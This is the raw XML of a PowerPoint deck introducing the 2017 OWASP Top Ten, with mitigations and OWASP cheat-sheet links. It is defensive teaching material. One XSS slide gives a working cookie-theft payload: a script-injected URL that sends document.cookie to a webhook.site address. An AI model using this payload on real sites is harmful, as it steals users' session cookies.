            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html-single/selinux_users_and_administrators_guide/index</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>As a Linux system admin (2001 - 2003), the FIRST thing I would do on a new server install is turn </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELinux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> off because it was annoying as frack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56" y="2551104"/>
            <a:ext cx="5051320" cy="175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4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A6:2017 – Security Misconfigurations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Design Good Access Control Up Front</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://cheatsheetseries.owasp.org/cheatsheets/Access_Control_Cheat_Sheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use ABAC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://csrc.nist.gov/publications/detail/sp/800-162/final</a:t>
            </a:r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96" y="2885910"/>
            <a:ext cx="9396390" cy="3265248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565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A7:2017 – Cross Site Scripting (XSS)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  <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Content Placeholder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391E34-3329-45B7-93B9-A1A67D45F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24" y="1530144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8613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C9A4E2-6726-4F99-936A-55E6F5EF8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22" y="3691200"/>
            <a:ext cx="5323723" cy="2991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A7:2017 – Cross Site Scripting (XSS)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2051766"/>
            <a:ext cx="10114935" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reflected (Sent to victim by attacker) vs. Persisted/Stored</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XSS Attack: Cookie Theft</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://vulnerable.webapp/index.php?name=&lt;script&gt;document.write('&lt;img </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>="https://webhook.site/xxx-xxx-xxx/?c='%2bdocument.cookie%2b'" /&gt;');&lt;/script&gt;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49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22" y="643467"/>
            <a:ext cx="9439452" cy="32802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A7:2017 – Cross Site Scripting (XSS) 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bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html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hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html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hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://owasp.org/www-community/xss-filter-evasion-cheatsheet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1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038CD-BD9E-4922-83B2-6978312A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BLUF – Bottom Line Up Front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25C719-F6A8-4FD8-88AF-E86F3BB66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233" y="1398903"/>
            <a:ext cx="6781121" cy="36109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6FD2-36D8-43BA-8647-F0221FBD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This presentation is the (2017) v.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Application Security Risks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Collective Product of feedback from security experts globally</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2021 version coming Soon™ (possibly this summer, probably fall)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Brand new site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.owasptopten.org</a:t>
            </a:r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8E023-274C-4CA0-BF6E-A287C4A2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84" y="5177121"/>
            <a:ext cx="4837061" cy="16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A8:2017 – Insecure Deserialization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2F4069-9FC6-4134-B3F0-05C4A3BE576E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="363951" y="3885065"/>
            <a:ext cx="6985495" cy="1197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400" dirty="0"/>
              <a:t>Binary Stream -&gt; Object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14961" y="2200646"/>
            <a:ext cx="6579910" cy="22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A8:2017 – Insecure Deserialization (Mitigations)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A8F350E-CFD5-447F-81B9-AD5694C6E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5431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25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A8:2017 – Insecure Deserialization (Guidance)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4" y="3340470"/>
            <a:ext cx="6579910" cy="22865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https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html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06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A9:2017 - Using Components w/ Known Vulns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FE9BBD3-91AF-450A-B60D-E1EC4CBDF8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6481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5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A9:2017 - Using Components w/ Known Vulns (Mitigations)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47752B6-321C-4859-8400-C99182588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2455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875" y="5696203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07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3400"/>
              <a:t>A9:2017 - Using Components w/ Known Vulns (Guidance)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695131" y="958617"/>
            <a:ext cx="4888676" cy="4290039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84" y="4751570"/>
            <a:ext cx="5017982" cy="120677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https://cheatsheetseries.owasp.org/cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html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28" y="2593839"/>
            <a:ext cx="2934082" cy="10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1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851517"/>
            <a:ext cx="10086259" cy="1461778"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>A10:2017 – Insufficient Logging\Monitoring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542" y="2470247"/>
            <a:ext cx="4048344" cy="3536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800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DO NOT</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="8800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="8800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IGNORE</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="8800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="8800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ALERTS!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3155124"/>
            <a:ext cx="3217333" cy="11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13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A10:2017 – Insufficient Logging\Monitoring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Intrusion Detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Forensic Analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Proof of regulatory compliance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>LOG EARLY, LOG OFTEN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Log ALL Authentication, login failure, change passwords, registration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DON’T LOG SENSITIVE DATA (Passwords, HIPPA, PIC,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9" y="5720937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38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2700"/>
              <a:t>A10:2017 – Insufficient Logging\Monitoring (Guidance)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320" y="965092"/>
            <a:ext cx="84055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cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html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6" y="2734056"/>
            <a:ext cx="10025500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70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2C5E87-CB8A-4EB6-9DF9-90164F54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04258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DE4BA-C1FC-458B-A925-FC639FD3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63" y="340596"/>
            <a:ext cx="5451504" cy="2754602"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0"/>
              <a:t>Thank you,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="8000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0"/>
              <a:t> Jim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0" err="1"/>
              <a:t>Manico</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8000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4C66-E9B5-4EA9-BF3B-71E56D21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63" y="3391472"/>
            <a:ext cx="6803007" cy="3123835"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Met him AppSec Cali 2019</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>OWASP Global Leader</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Taught me everything I know (about the Top Ten)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>jim@manicode.com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www.manicode.com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https://www.youtube.com/watch?v=SMcZ0el-9ro</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="24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0CD4D-A6AD-41A8-BBA7-30E0D0295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74" y="3539590"/>
            <a:ext cx="2229761" cy="774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352A0-494F-4207-ADB4-887AB5F98E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69" y="1275395"/>
            <a:ext cx="2846216" cy="284621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BD5A811-59CD-466E-8345-1DD993DB1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1086" y="4314432"/>
            <a:ext cx="3171548" cy="4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0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7983"/>
            <a:ext cx="3051110" cy="106026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A3AE85F-2B3A-4621-AD3E-D1C7354A1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66" y="942592"/>
            <a:ext cx="8307868" cy="255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A1:2017 –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NUMBER ONE RISK!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL? Yes, but not limited to JUST SQL.\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Includes command injection, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>regexe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> injection, DNA injection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113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F085A-B14F-45A7-ADAF-3AB5F0F3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BC58-2BA5-4A32-91E5-2BE78BF6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76" y="4394719"/>
            <a:ext cx="7743949" cy="6102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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Questions?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="8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3F171-8C49-49F0-A8ED-0325580F4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520506"/>
            <a:ext cx="3858600" cy="1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6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A1:2017 – Injection (Mitigations)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A9B2991-8B01-45B0-81AA-DC02DF8DD9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99" y="365125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9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A1:2017 – Injection (Guidance)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Input Validation Client-Side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hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html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Parameterization Server-Side</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://cheatsheetseries.owasp.org/cheatsheets/Query_Parameterization_Cheat_Sheet.html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76" y="2520506"/>
            <a:ext cx="3858600" cy="1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6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3100"/>
              <a:t>A2:2017 – Broken Authentication &amp;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3100"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3100"/>
              <a:t>Session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1700"/>
              <a:t>Q) What is AUTHENTICATION?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700"/>
              <a:t>Establishes the identity of the person using the system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1700"/>
              <a:t>Q) What is an authentication session?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700"/>
              <a:t>an area of memory or storage that tracks the status of who or what is using the system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1700"/>
              <a:t>Q) What is session management?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700"/>
              <a:t>The way we manage those sessions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700"/>
              <a:t>Stateless (JWT for Websites) / Stateful (Active Directory)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1700"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="17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3155124"/>
            <a:ext cx="3217333" cy="11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1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A2:2017 – Broken Authentication &amp;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session Management (Mitigations)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39CDDF2-005D-498F-894C-E128EEF29F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18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6203"/>
            <a:ext cx="2766959" cy="9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9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102C-2110-4109-9EEC-E1C846D0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2500"/>
              <a:t>A2:2017 – Broken Authentication &amp;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2500"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2500"/>
              <a:t>Session Management (Mitigations)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607-5A81-4129-AA86-B9B5BBC3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200"/>
              <a:t>USE MFA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>Password policies need to be changed (NIST-800-64B)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>Block use of Known usernames/passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" baseline="30000"/>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t> Party Breach Services Available</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>(when updated force password change on users!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2200"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2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76F8-BA94-460C-8B6F-879A0857E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3155124"/>
            <a:ext cx="3217333" cy="11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1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2076</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>225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Introduction to the  OWASP TOP TEN</vt:lpstr>
      <vt:lpstr>Who is CryptoJones?</vt:lpstr>
      <vt:lpstr>BLUF – Bottom Line Up Front</vt:lpstr>
      <vt:lpstr>A1:2017 – Injection</vt:lpstr>
      <vt:lpstr>A1:2017 – Injection (Mitigations)</vt:lpstr>
      <vt:lpstr>A1:2017 – Injection (Guidance)</vt:lpstr>
      <vt:lpstr>A2:2017 – Broken Authentication &amp; Session Management</vt:lpstr>
      <vt:lpstr>A2:2017 – Broken Authentication &amp; Session Management (Mitigations)</vt:lpstr>
      <vt:lpstr>A2:2017 – Broken Authentication &amp; Session Management (Mitigations)</vt:lpstr>
      <vt:lpstr>A2:2017 – Broken Authentication &amp; Session Management (Mitigations)</vt:lpstr>
      <vt:lpstr>A2:2017 – Broken Authentication &amp; Session Management (Guidance)</vt:lpstr>
      <vt:lpstr>A3:2017 – Sensitive Data Exposure</vt:lpstr>
      <vt:lpstr>A3:2017 – Sensitive Data Exposure (Mitigations)</vt:lpstr>
      <vt:lpstr>A3:2017 – Sensitive Data Exposure (Mitigations) (Continued)</vt:lpstr>
      <vt:lpstr>A3:2017 – Sensitive Data Exposure(Guidance)</vt:lpstr>
      <vt:lpstr>A4:2017 – XML External Entities (XXE)</vt:lpstr>
      <vt:lpstr>A4:2017 – XML External Entities (XXE) (Cont.)</vt:lpstr>
      <vt:lpstr>A4:2017 – XML External Entities (XXE) (Mitigations)</vt:lpstr>
      <vt:lpstr>A4:2017 – XML External Entities (XXE) (Guidance)</vt:lpstr>
      <vt:lpstr>A5:2017 – Broken Access Control (Example)</vt:lpstr>
      <vt:lpstr>A5:2017 – Broken Access Control (Mitigations)</vt:lpstr>
      <vt:lpstr>A5:2017 – Broken Access Control  (Guidance)</vt:lpstr>
      <vt:lpstr>A6:2017 – Security Misconfigurations</vt:lpstr>
      <vt:lpstr>A6:2017 – Security Misconfigurations (Mitigations)</vt:lpstr>
      <vt:lpstr>A6:2017 – Security Misconfigurations (Guidance)</vt:lpstr>
      <vt:lpstr>A6:2017 – Security Misconfigurations (Guidance)</vt:lpstr>
      <vt:lpstr>A7:2017 – Cross Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>A7:2017 – Cross Site Scripting (XSS) (Mitigations)</vt:lpstr>
      <vt:lpstr>A7:2017 – Cross Site Scripting (XSS)  (Guidance)</vt:lpstr>
      <vt:lpstr>A8:2017 – Insecure Deserialization</vt:lpstr>
      <vt:lpstr>A8:2017 – Insecure Deserialization (Mitigations)</vt:lpstr>
      <vt:lpstr>A8:2017 – Insecure Deserialization (Guidance)</vt:lpstr>
      <vt:lpstr>A9:2017 - Using Components w/ Known Vulns</vt:lpstr>
      <vt:lpstr>A9:2017 - Using Components w/ Known Vulns (Mitigations)</vt:lpstr>
      <vt:lpstr>A9:2017 - Using Components w/ Known Vulns (Guidance)</vt:lpstr>
      <vt:lpstr>A10:2017 – Insufficient Logging\Monitoring</vt:lpstr>
      <vt:lpstr>A10:2017 – Insufficient Logging\Monitoring</vt:lpstr>
      <vt:lpstr>A10:2017 – Insufficient Logging\Monitoring (Guidance)</vt:lpstr>
      <vt:lpstr>Thank you,  Jim Manico!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 OWASP TOP TEN</dc:title>
  <dc:creator>Aaron Clark</dc:creator>
  <cp:lastModifiedBy>Aaron Clark</cp:lastModifiedBy>
  <cp:revision>23</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-05-12T17:46:59Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-05-12T22:33:45Z</dcterms:modified>
</cp:coreProperties>
</file>